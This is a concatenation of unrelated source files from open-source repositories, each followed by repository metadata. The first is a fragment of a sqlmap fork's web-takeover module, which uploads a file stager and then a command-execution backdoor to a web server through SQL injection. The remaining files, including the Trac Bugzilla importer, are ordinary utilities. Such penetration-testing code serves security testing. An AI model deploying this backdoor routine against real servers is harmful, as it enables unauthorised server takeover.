此方法用于在 web 服务器文档根目录中的可写远程目录中写入 web 后门 (代理)。
"""
if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
return
self.checkDbmsOs()
default = None
choices = list(getPublicTypeMembers(WEB_API, True))
for ext in choices:
if conf.url.endswith(ext):
default = ext
break
if not default:
default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP
message = u"Web服务器支持哪种Web应用程序语言?\n"
for count in xrange(len(choices)):
ext = choices[count]
message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))
if default == ext:
default = count + 1
message = message[:-1]
while True:
choice = readInput(message, default=str(default))
if not choice.isdigit():
logger.warn("无效值,只允许使用数字")
elif int(choice) < 1 or int(choice) > len(choices):
logger.warn("无效值,它必须介于1和%d之间" % len(choices))
else:
self.webApi = choices[int(choice) - 1]
break
if not kb.absFilePaths:
message = "你是否希望sqlmap进一步尝试引发完整的路径泄露? [Y/n] "
if readInput(message, default='Y', boolean=True):
headers = {}
been = set([conf.url])
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
if url not in been:
try:
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
parseFilePaths(page)
except:
pass
finally:
been.add(url)
url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url)
if url not in been:
try:
page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
parseFilePaths(page)
except:
pass
finally:
been.add(url)
for place in (PLACE.GET, PLACE.POST):
if place in conf.parameters:
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
if "[]" in value:
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
cookie = None
if PLACE.COOKIE in conf.parameters:
cookie = conf.parameters[PLACE.COOKIE]
elif headers and HTTP_HEADER.SET_COOKIE in headers:
cookie = headers[HTTP_HEADER.SET_COOKIE]
if cookie:
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
if value != cookie:
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
if value != cookie:
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
parseFilePaths(page)
directories = list(arrayizeValue(getManualDirectories()))
directories.extend(getAutoDirectories())
directories = list(oset(directories))
path = urlparse.urlparse(conf.url).path or '/'
if path != '/':
_ = []
for directory in directories:
_.append(directory)
if not directory.endswith(path):
_.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
directories = _
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
for directory in directories:
if not directory:
continue
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
uploaded = False
directory = ntToPosixSlashes(normalizePath(directory))
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
directory = "/%s" % directory
if not directory.endswith('/'):
directory += '/'
# 使用LIMIT 0,1 INTO DUMPFILE方法上传文件
#LINES子句:在LINES子句中使用TERMINATED BY指定一行结束的标志,如“LINES TERMINATED BY '?'”表示一行以“?”作为结束标志。"
infoMsg = u"尝试通过LIMIT'LINES TERMINATED BY'方法上传'%s'上的文件" % directory
logger.info(infoMsg)
self._webFileInject(stagerContent, stagerName, directory)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = u"尝试查看该文件是否可以从'%s'访问" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
# 退回到UNION查询文件上传方法
if not uploaded:
warnMsg = u"无法在'%s'中上传文件" % directory
singleTimeWarnMessage(warnMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
infoMsg = u"尝试通过UNION方法将文件上传到'%s'上" % directory
logger.info(infoMsg)
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
handle, filename = tempfile.mkstemp()
os.close(handle)
with open(filename, "w+b") as f:
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
_ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
f.write(_)
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = u"正在尝试查看文件是否可以从'%s'访问" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
if not uploaded:
continue
if "<%" in uplPage or "<?" in uplPage:
warnMsg = u"文件stager上传在'%s', " % directory
warnMsg += u"但不动态解释"
logger.warn(warnMsg)
continue
elif self.webApi == WEB_API.ASPX:
kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
infoMsg = u"文件stager已成功上传到'%s' - %s" % (directory, self.webStagerUrl)
logger.info(infoMsg)
if self.webApi == WEB_API.ASP:
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match:
backdoorDirectory = match.group(1)
else:
continue
_ = "tmpe%s.exe" % randomStr(lowercase=True)
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_"))
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory
else:
continue
else:
if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
warnMsg = u"后门没有通过file stager成功上传,"
warnMsg += u"这可能是因为运行Web服务器进程的用户没有权限"
warnMsg += u"在运行DBMS进程的用户文件夹中上传文件,因为没有写入权限,"
warnMsg += u"或者因为DBMS和Web服务位于不同的服务器上"
logger.warn(warnMsg)
message = u"你想尝试使用与文件stager相同的方法? [Y/n] "
if readInput(message, default='Y', boolean=True):
self._webFileInject(backdoorContent, backdoorName, directory)
else:
continue
self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
self.webDirectory = directory
self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
testStr = u"命令执行测试"
output = self.webBackdoorRunCmd("echo %s" % testStr)
if output == "0":
warnMsg = u"后门已经上传,但缺少运行系统命令的必需权限"
raise SqlmapNoneDataException(warnMsg)
elif output and testStr in output:
infoMsg = u"后门已经成功 "
else:
infoMsg = u"后门可能已经成功 "
infoMsg += u"上传到'%s' - " % self.webDirectory
infoMsg += self.webBackdoorUrl
logger.info(infoMsg)
break
|
hackersql/sq1map
|
lib/takeover/web.py
|
Python
|
gpl-3.0
| 16,870
|
from datetime import datetime, timedelta
from yledl.timestamp import parse_areena_timestamp
def test_timestamp():
ts = parse_areena_timestamp('2018-01-02T18:30:00+02:00')
assert ts.replace(tzinfo=None) == datetime(2018, 1, 2, 18, 30, 00)
assert ts.utcoffset() == timedelta(hours=2)
def test_timestamp_strip():
ts = parse_areena_timestamp(' 2018-01-02T18:30:00+02:00 ')
assert ts.replace(tzinfo=None) == datetime(2018, 1, 2, 18, 30, 00)
def test_invalid_timestamp():
assert parse_areena_timestamp('xxx2018-01-02T18:30:00+02:00') is None
assert parse_areena_timestamp('2018-01-02T18:30:00') is None
assert parse_areena_timestamp('2018-01-999999T18:30:00+02:00') is None
assert parse_areena_timestamp('2018-01-999999T22222') is None
|
aajanki/yle-dl
|
tests/test_timestamp.py
|
Python
|
gpl-3.0
| 778
|
import logging
import os
from django.conf import settings
from django.template import loader
__all__ = ('gen_all_templates',)
def gen_all_templates():
"""
Generator. Finds paths for all the templates accessible through the loaders in TEMPLATE_LOADERS.
Yields tuples: (rel_path, abs_path)
"""
from django.template.loaders.cached import Loader as CachedLoader
if not loader.template_source_loaders:
# force the template loaders to populate
try:
loader.find_template('foo')
except loader.TemplateDoesNotExist:
pass
loaders = []
for l in loader.template_source_loaders:
if isinstance(l, CachedLoader):
# flatten cached loaders, otherwise they're kinda complex
loaders.extend(l.loaders)
else:
loaders.append(l)
for l in loaders:
for tupl in gen_loader_templates(l):
yield tupl
def gen_loader_templates(l):
"""
Generator. Yields paths to the templates for the given loader.
"""
logging.info('Using loader: %r' % l)
from django.template.loaders.app_directories import Loader as ADLoader
from django.template.loaders.filesystem import Loader as FSLoader
#from django.template.loaders.eggs import Loader as EggsLoader
if isinstance(l, ADLoader):
gen = _gen_AD_templates
elif isinstance(l, FSLoader):
gen = _gen_FS_templates
else:
#TODO EggsLoader (any others?)
# TODO: should probably just raise a warning here, since any other loaders in settings will work fine.
raise ValueError("django-tc doesn't support this loader: %s" % l.__class__.__name__)
for tupl in gen(l):
yield tupl
def _gen_AD_templates(l):
"""
Generator. Takes an app_directories loader, and yields paths to the templates for it.
"""
from django.template.loaders.app_directories import app_template_dirs
for tupl in _gen_FS_templates(l, app_template_dirs):
yield tupl
def _gen_FS_templates(l, template_dirs=settings.TEMPLATE_DIRS):
"""
Generator. Takes a filesystem loader, and yields paths to the templates for it.
"""
for template_dir in template_dirs:
logging.info('Looking in template directory %r' % template_dir)
for path, dirs, files in os.walk(template_dir, followlinks=True):
for f in files:
abs_path = os.path.join(path, f)
rel_path = abs_path[len(template_dir):]
if rel_path[0] == '/':
rel_path = rel_path[1:]
logging.info('Found template %r' % rel_path)
yield (rel_path, abs_path)
|
craigds/django-tc
|
tc/loading.py
|
Python
|
mit
| 2,724
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: LiSnB
# @Date: 2014-06-06 19:32:15
# @Last Modified by: LiSnB
# @Last Modified time: 2014-06-06 19:32:15
# @Email: lisnb.h@gmail.com
"""
# @comment here:
"""
if __name__ == '__main__':
pass
|
lisnb/intelliSeg
|
mm/__init__.py
|
Python
|
mit
| 293
|
# -*- mode: python, coding: utf-8 -*-
# Copyright © 2016 by Jeffrey C. Ollie
#
# This file is part of ceph_exporter.
#
# ceph_exporter is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# ceph_exporter is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ceph_exporter. If not, see
# <http://www.gnu.org/licenses/>.
from ...prometheus import Metric
__all__ = ['ceph']
ceph_pg_state = Metric('ceph_pg_state', None, 'gauge')
|
jcollie/ceph_exporter
|
ceph_exporter/ceph/metrics/ceph_pg_state.py
|
Python
|
gpl-3.0
| 870
|
# Copyright (C) 2009 Luke Kenneth Casson Leighton <lkcl@lkcl.net>
#
# Pyjamas Widget Factory. register widgets with this module,
# for dynamic use in applications. please observe namespaces.
#
# * pyjamas.ui namespace is used for widgets in library/pyjamas/ui
#from __pyjamas__ import doc
from pyjamas import log
from pyjamas import DOM
factory = {}
def registerClass(modname, klsname, kls):
global factory
if modname is None:
modname = '.'.join(['pyjamas.ui', klsname])
name = '.'.join([modname, klsname])
factory[name] = kls
def lookupClass(name):
return factory[name]
def createWidgetOnElement(element):
fc = DOM.getAttribute(element, 'id')
lbr = fc.find("(")
klsname = fc[:lbr]
txtargs = fc[lbr+1:-1]
args = []
kwargs = {}
for arg in txtargs.split(','):
findeq = arg.find('=')
if findeq == -1:
args.append(arg)
else:
k = arg[:findeq]
v = arg[findeq+1:]
if ((v[0] == "'" and v[-1] == "'") or
(v[0] == '"' and v[-1] == '"')):
# string - strip quotes
v = v[1:-1]
else:
# assume it's an int
v = int(v)
kwargs[k] = v
kwargs['Element'] = element
return lookupClass(klsname)(*args, **kwargs)
def addPyjamasNameSpace():
doc().createElementNS("urn:schemas-pyjs-org:pyjs")
#try:
# ns = doc().namespaces.item("pyjs")
#except:
# doc().namespaces.add("pyjsinit", "urn:schemas-pyjs-org:pyjs")
#doc().createStyleSheet().cssText = "v\\:*{behavior:url(#default#VML);}"
|
anandology/pyjamas
|
library/pyjamas/Factory.py
|
Python
|
apache-2.0
| 1,645
|
#!/usr/bin/env python
"""
Create input tasks for 2010-2013 pad delineator
"""
import argparse
import json
import os
import time
from pprint import pprint
import sys
def get_classification(task_runs):
"""
Determine task run's classification based on the crowd's response
Returns
-------
str
Classification
"""
output = None
responses = {}
for tr in task_runs:
selection = tr['info']['selection']
if selection in responses:
responses[selection] += 1
else:
responses[selection] = 1
max_selection = max(responses.values())
for resp, count in responses.items():
# The output has not been set yet and the count for this response matches the maximum number of counts
if output is None and count is max_selection:
output = resp
# The output has already been set, which means that there are at least two responses that tied for first place
# Only one of these occurred in the Tadpole tasks so just return None
elif output is not None and count is max_selection:
return None
return output
def main(args):
# Parse arguments
parser = argparse.ArgumentParser(description="Create input tasks for OH pad delineator 2010-2013")
parser.add_argument(
'input_tasks', metavar='task.json', help="Input task.json")
parser.add_argument(
'input_task_runs', metavar='Input task_run.json')
parser.add_argument(
'output_tasks', metavar='output-tasks.json', help="Output task file")
parser.add_argument(
'--overwrite', default=False, action='store_true')
pargs = parser.parse_args(args=args)
# Validate
if not os.access(pargs.input_tasks, os.R_OK):
print("ERROR: Can't find input tasks: {}".format(pargs.input_tasks))
return 1
elif not os.access(pargs.input_tasks, os.R_OK):
print("ERROR: Can't find input task runs: {}".format(pargs.input_task_runs))
return 1
elif not pargs.overwrite and os.path.isfile(pargs.output_tasks):
print("ERROR: Output file exists and overwrite={0}: {1}".format(pargs.overwrite, pargs.output_tasks))
return 1
# Cache files and index by ID
with open(pargs.input_tasks) as f:
tasks = json.load(f)
with open(pargs.input_task_runs) as f:
task_runs = json.load(f)
# Index tasks by SiteID so that {site_id: [task1, t2, ...]}
input_tasks = {}
for task in tasks:
tid = task['id']
if tid in input_tasks:
input_tasks[tid].append(task)
else:
input_tasks[tid] = [task]
# Index task runs by ID so that {id: [task1, t2, ...]}
input_task_runs = {}
for tr in task_runs:
tid = tr['task_id']
if tid in input_task_runs:
input_task_runs[tid].append(tr)
else:
input_task_runs[tid] = [tr]
# Container for all output tasks
output_tasks = []
# Process all site ID's in the input_tasks (task.json)
progress_total = len(input_tasks)
progress_i = 0
num_output_tasks = 0
print("Processing site ID's ...")
for tid, tasks in input_tasks.items():
progress_i += 1
sys.stdout.write("\r\x1b[K" + " {0}/{1}".format(progress_i, progress_total))
sys.stdout.flush()
if progress_i >= progress_total:
sys.stdout.write(os.linesep)
# Sort the associated tasks in year order
ordered_tasks = []
_tasks = {int(t['info']['year']): t for t in tasks}
for y in sorted(_tasks.keys()):
ordered_tasks.append(_tasks[y])
# Write each task in sorted order
for task in sorted(ordered_tasks):
classification = get_classification([tr for tr in input_task_runs[tid] if tr['task_id'] == tid])
if classification is not None and classification.lower() == 'pad':
num_output_tasks += 1
# Strip off all the non-required fields
otask = {'info': task['info'].copy()}
# Task modifications
del otask['info']['options']
del otask['info']['url']
otask['info']['question'] = 'Please drag on the edges of the shape to make it fit the drill pad you see in the satellite image'
# The first two API's are duplicates - force a unique list
otask['info']['apis'] = json.dumps(list(set(json.loads(task['info']['apis']))))
otask['info']['imagery'] = [
{
'options': {
'layers': '06136759344167181854-11275828430006462017-4'
},
'title': '2013',
'type': 'WMS',
'url': 'https://mapsengine.google.com/06136759344167181854-11845109403981099587-4/wms/'
},
{
'options': {
'layers': '06136759344167181854-08224624193234342065-4'
},
'title': '2011',
'type': 'WMS',
'url': 'https://mapsengine.google.com/06136759344167181854-11845109403981099587-4/wms/'
},
{
'options': {
'layers': '06136759344167181854-04770958895915995837-4'
},
'title': '2010',
'type': 'WMS',
'url': 'https://mapsengine.google.com/06136759344167181854-11845109403981099587-4/wms/'
}
]
# The user is supposed to digitize against a specific year. Make sure the imagery block for that year
# contains a key called 'active' that is set to `True'
for idx, imagery_tag in enumerate(otask.copy()['info']['imagery']):
if str(imagery_tag['title']) == str(task['info']['year']):
imagery_tag['active'] = True
otask['info']['imagery'][idx] = imagery_tag
output_tasks.append(otask)
# Done processing - print report
with open(pargs.output_tasks, 'w') as f:
json.dump(output_tasks, f)
print("Wrote {} output tasks".format(num_output_tasks))
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
SkyTruth/CrowdProjects
|
Data/FrackFinder/OH/2010-2013/Pad-Delineator/bin/create_input_tasks.py
|
Python
|
bsd-3-clause
| 6,510
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.editor, name="editor"),
url(r'^game/$', views.edit_game, name="add_game"),
url(r'^game/(?P<gameid>\d+)/$', views.edit_game, name="edit_game"),
url(r'^event/$', views.edit_event, name="add_event"),
url(r'^event/(?P<evid>\d+)/$', views.edit_event, name="edit_event"),
url(r'^ajax/player/$', views.ajax_player_search, name="ajax_player_search"),
url(r'^api/game/(?P<game_id>\d+)/$', views.gameview, name='get_game'),
url(r'^api/game/$', views.gameview, name='new_game'),
url(r'^api/games/$', views.gamelist, name='get_games'),
url(r'^api/ev/(?P<ev_id>\d+)/$', views.evview, name='get_ev'),
url(r'^api/ev/$', views.evview, name='new_ev'),
]
|
wadobo/socializa
|
backend/editor/urls.py
|
Python
|
agpl-3.0
| 775
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2004-2019 Edgewall Software
# Copyright (C) 2004 Dmitry Yusupov <dmitry_yus@yahoo.com>
# Copyright (C) 2004 Mark Rowe <mrowe@bluewire.net.nz>
# Copyright (C) 2005 Bill Soudan <bill@soudan.net>
# Copyright (C) 2005 Florent Guillaume <fg@nuxeo.com>
# Copyright (C) 2005 Jeroen Ruigrok van der Werven <asmodai@in-nomine.org>
# Copyright (C) 2010 Jeff Moreland <hou5e@hotmail.com>
#
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/.
"""
Import a Bugzilla items into a Trac database.
Requires: Trac 0.9b1 from http://trac.edgewall.org/
Python 2.3 from http://www.python.org/
MySQL >= 3.23 from http://www.mysql.org/
or PostGreSQL 8.4 from http://www.postgresql.org/
or SQLite 3 from http://www.sqlite.org/
$Id$
"""
import re
###
### Conversion Settings -- edit these before running if desired
###
# Bugzilla version. You can find this in Bugzilla's globals.pl file.
#
# Currently, the following bugzilla versions are known to work:
# 2.11 (2110), 2.16.5 (2165), 2.16.7 (2167), 2.18.3 (2183), 2.19.1 (2191),
# 2.23.3 (2233), 3.04.4 (3044)
#
# If you run this script on a version not listed here and it is successful,
# please file a ticket at http://trac.edgewall.org
#
BZ_VERSION = 3044
# MySQL connection parameters for the Bugzilla database. These can also
# be specified on the command line.
BZ_DB = ""
BZ_HOST = ""
BZ_USER = ""
BZ_PASSWORD = ""
# Path to the Trac environment.
TRAC_ENV = "/usr/local/trac"
# If true, all existing Trac tickets and attachments will be removed
# prior to import.
TRAC_CLEAN = True
# Enclose imported ticket description and comments in a {{{ }}}
# preformat block? This formats the text in a fixed-point font.
PREFORMAT_COMMENTS = False
# Replace bug numbers in comments with #xyz
REPLACE_BUG_NO = False
# Severities
SEVERITIES = [
("blocker", "1"),
("critical", "2"),
("major", "3"),
("normal", "4"),
("minor", "5"),
("trivial", "6")
]
# Priorities
# If using the default Bugzilla priorities of P1 - P5, do not change anything
# here.
# If you have other priorities defined please change the P1 - P5 mapping to
# the order you want. You can also collapse multiple priorities on bugzilla's
# side into the same priority on Trac's side, simply adjust PRIORITIES_MAP.
PRIORITIES = [
("highest", "1"),
("high", "2"),
("normal", "3"),
("low", "4"),
("lowest", "5")
]
# Bugzilla: Trac
# NOTE: Use lowercase.
PRIORITIES_MAP = {
"p1": "highest",
"p2": "high",
"p3": "normal",
"p4": "low",
"p5": "lowest"
}
# By default, all bugs are imported from Bugzilla. If you add a list
# of products here, only bugs from those products will be imported.
PRODUCTS = []
# These Bugzilla products will be ignored during import.
IGNORE_PRODUCTS = []
# These milestones are ignored
IGNORE_MILESTONES = ["---"]
# Don't import user names and passwords into htpassword if
# user is disabled in bugzilla? (i.e. profiles.DisabledText<>'')
IGNORE_DISABLED_USERS = True
# These logins are converted to these user ids
LOGIN_MAP = {
#'some.user@example.com': 'someuser',
}
# These emails are removed from CC list
IGNORE_CC = [
#'loser@example.com',
]
# The 'component' field in Trac can come either from the Product or
# or from the Component field of Bugzilla. COMPONENTS_FROM_PRODUCTS
# switches the behavior.
# If COMPONENTS_FROM_PRODUCTS is True:
# - Bugzilla Product -> Trac Component
# - Bugzilla Component -> Trac Keyword
# IF COMPONENTS_FROM_PRODUCTS is False:
# - Bugzilla Product -> Trac Keyword
# - Bugzilla Component -> Trac Component
COMPONENTS_FROM_PRODUCTS = False
# If COMPONENTS_FROM_PRODUCTS is True, the default owner for each
# Trac component is inferred from a default Bugzilla component.
DEFAULT_COMPONENTS = ["default", "misc", "main"]
# This mapping can assign keywords in the ticket entry to represent
# products or components (depending on COMPONENTS_FROM_PRODUCTS).
# The keyword will be ignored if empty.
KEYWORDS_MAPPING = {
#'Bugzilla_product_or_component': 'Keyword',
"default": "",
"misc": "",
}
# If this is True, products or components are all set as keywords
# even if not mentionned in KEYWORDS_MAPPING.
MAP_ALL_KEYWORDS = True
# Custom field mappings
CUSTOMFIELD_MAP = {
#'Bugzilla_field_name': 'Trac_customfield_name',
#'op_sys': 'os',
#'cf_featurewantedby': 'wanted_by',
#'product': 'product'
}
# Bug comments that should not be imported. Each entry in list should
# be a regular expression.
IGNORE_COMMENTS = [
"^Created an attachment \(id="
]
###########################################################################
### You probably don't need to change any configuration past this line. ###
###########################################################################
# Bugzilla status to Trac status translation map.
#
# NOTE: bug activity is translated as well, which may cause bug
# activity to be deleted (e.g. resolved -> closed in Bugzilla
# would translate into closed -> closed in Trac, so we just ignore the
# change).
#
# There is some special magic for open in the code: if there is no
# Bugzilla owner, open is mapped to 'new' instead.
STATUS_TRANSLATE = {
"unconfirmed": "new",
"open": "assigned",
"resolved": "closed",
"verified": "closed",
"released": "closed"
}
# Translate Bugzilla statuses into Trac keywords. This provides a way
# to retain the Bugzilla statuses in Trac. e.g. when a bug is marked
# 'verified' in Bugzilla it will be assigned a VERIFIED keyword.
STATUS_KEYWORDS = {
"verified": "VERIFIED",
"released": "RELEASED"
}
# Some fields in Bugzilla do not have equivalents in Trac. Changes in
# fields listed here will not be imported into the ticket change history,
# otherwise you'd see changes for fields that don't exist in Trac.
IGNORED_ACTIVITY_FIELDS = ["everconfirmed"]
# Regular expression and its replacement
# this expression will update references to bugs 1 - 99999 that
# have the form "bug 1" or "bug #1"
BUG_NO_RE = re.compile(r"\b(bug #?)([0-9]{1,5})\b", re.I)
BUG_NO_REPL = r"#\2"
###
### Script begins here
###
import io
import os
import sys
import string
import pymysql
from trac.attachment import Attachment
from trac.env import Environment
if not hasattr(sys, 'setdefaultencoding'):
reload(sys)
sys.setdefaultencoding('latin1')
# simulated Attachment class for trac.add
#class Attachment:
# def __init__(self, name, data):
# self.filename = name
# self.file = io.BytesIO(data.tostring())
# simple field translation mapping. if string not in
# mapping, just return string, otherwise return value
class FieldTranslator(dict):
def __getitem__(self, item):
if item not in self:
return item
return dict.__getitem__(self, item)
statusXlator = FieldTranslator(STATUS_TRANSLATE)
class TracDatabase(object):
def __init__(self, path):
self.env = Environment(path)
self.loginNameCache = {}
self.fieldNameCache = {}
from trac.db.api import DatabaseManager
self.using_postgres = \
DatabaseManager(self.env).connection_uri.startswith("postgres:")
def hasTickets(self):
return int(self.env.db_query("SELECT count(*) FROM ticket")[0][0] > 0)
def assertNoTickets(self):
if self.hasTickets():
raise Exception("Will not modify database with existing tickets!")
def setSeverityList(self, s):
"""Remove all severities, set them to `s`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM enum WHERE type='severity'")
for value, i in s:
print(" inserting severity '%s' - '%s'" % (value, i))
db("""INSERT INTO enum (type, name, value)
VALUES (%s, %s, %s)""",
("severity", value, i))
def setPriorityList(self, s):
"""Remove all priorities, set them to `s`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM enum WHERE type='priority'")
for value, i in s:
print(" inserting priority '%s' - '%s'" % (value, i))
db("INSERT INTO enum (type, name, value) VALUES (%s, %s, %s)",
("priority", value, i))
def setComponentList(self, l, key):
"""Remove all components, set them to `l`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM component")
for comp in l:
print(" inserting component '%s', owner '%s'"
% (comp[key], comp['owner']))
db("INSERT INTO component (name, owner) VALUES (%s, %s)",
(comp[key], comp['owner']))
def setVersionList(self, v, key):
"""Remove all versions, set them to `v`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM version")
for vers in v:
print(" inserting version '%s'" % vers[key])
db("INSERT INTO version (name) VALUES (%s)",
(vers[key],))
def setMilestoneList(self, m, key):
"""Remove all milestones, set them to `m`"""
self.assertNoTickets()
with self.env.db_transaction as db:
db("DELETE FROM milestone")
for ms in m:
milestone = ms[key]
print(" inserting milestone '%s'" % milestone)
db("INSERT INTO milestone (name) VALUES (%s)",
(milestone,))
def addTicket(self, id, time, changetime, component, severity, priority,
owner, reporter, cc, version, milestone, status, resolution,
summary, description, keywords, customfields):
desc = description
type = "defect"
if SEVERITIES:
if severity.lower() == "enhancement":
severity = "minor"
type = "enhancement"
else:
if priority.lower() == "enhancement":
priority = "minor"
type = "enhancement"
if PREFORMAT_COMMENTS:
desc = '{{{\n%s\n}}}' % desc
if REPLACE_BUG_NO:
if BUG_NO_RE.search(desc):
desc = re.sub(BUG_NO_RE, BUG_NO_REPL, desc)
if priority in PRIORITIES_MAP:
priority = PRIORITIES_MAP[priority]
print(" inserting ticket %s -- %s" % (id, summary))
with self.env.db_transaction as db:
db("""INSERT INTO ticket (id, type, time, changetime, component,
severity, priority, owner, reporter, cc,
version, milestone, status, resolution,
summary, description, keywords)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s,
%s, %s, %s, %s)
""", (id, type, datetime2epoch(time),
datetime2epoch(changetime), component, severity,
priority, owner, reporter, cc, version, milestone,
status.lower(), resolution, summary, desc, keywords))
if self.using_postgres:
with self.env.db_transaction as db:
c = db.cursor()
c.execute("""
SELECT SETVAL('ticket_id_seq', MAX(id)) FROM ticket;
SELECT SETVAL('report_id_seq', MAX(id)) FROM report""")
ticket_id = db.get_last_id(c, 'ticket')
# add all custom fields to ticket
for name, value in customfields.iteritems():
self.addTicketCustomField(ticket_id, name, value)
return ticket_id
def addTicketCustomField(self, ticket_id, field_name, field_value):
if field_value is None:
return
self.env.db_transaction("""
INSERT INTO ticket_custom (ticket, name, value) VALUES (%s, %s, %s)
""", (ticket_id, field_name, field_value))
def addTicketComment(self, ticket, time, author, value):
comment = value
if PREFORMAT_COMMENTS:
comment = '{{{\n%s\n}}}' % comment
if REPLACE_BUG_NO:
if BUG_NO_RE.search(comment):
comment = re.sub(BUG_NO_RE, BUG_NO_REPL, comment)
with self.env.db_transaction as db:
db("""INSERT INTO ticket_change (ticket, time, author, field,
oldvalue, newvalue)
VALUES (%s, %s, %s, %s, %s, %s)
""", (ticket, datetime2epoch(time), author, 'comment', '',
comment))
def addTicketChange(self, ticket, time, author, field, oldvalue, newvalue):
if field == "owner":
if oldvalue in LOGIN_MAP:
oldvalue = LOGIN_MAP[oldvalue]
if newvalue in LOGIN_MAP:
newvalue = LOGIN_MAP[newvalue]
if field == "priority":
if oldvalue.lower() in PRIORITIES_MAP:
oldvalue = PRIORITIES_MAP[oldvalue.lower()]
if newvalue.lower() in PRIORITIES_MAP:
newvalue = PRIORITIES_MAP[newvalue.lower()]
# Doesn't make sense if we go from highest -> highest, for example.
if oldvalue == newvalue:
return
with self.env.db_transaction as db:
db("""INSERT INTO ticket_change (ticket, time, author, field,
oldvalue, newvalue)
VALUES (%s, %s, %s, %s, %s, %s)
""", (ticket, datetime2epoch(time), author, field,
oldvalue, newvalue))
def addAttachment(self, author, a):
if a['filename'] != '':
description = a['description']
id = a['bug_id']
filename = a['filename']
filedata = io.BytesIO(a['thedata'])
filesize = len(filedata.getvalue())
time = a['creation_ts']
print(" ->inserting attachment '%s' for ticket %s -- %s"
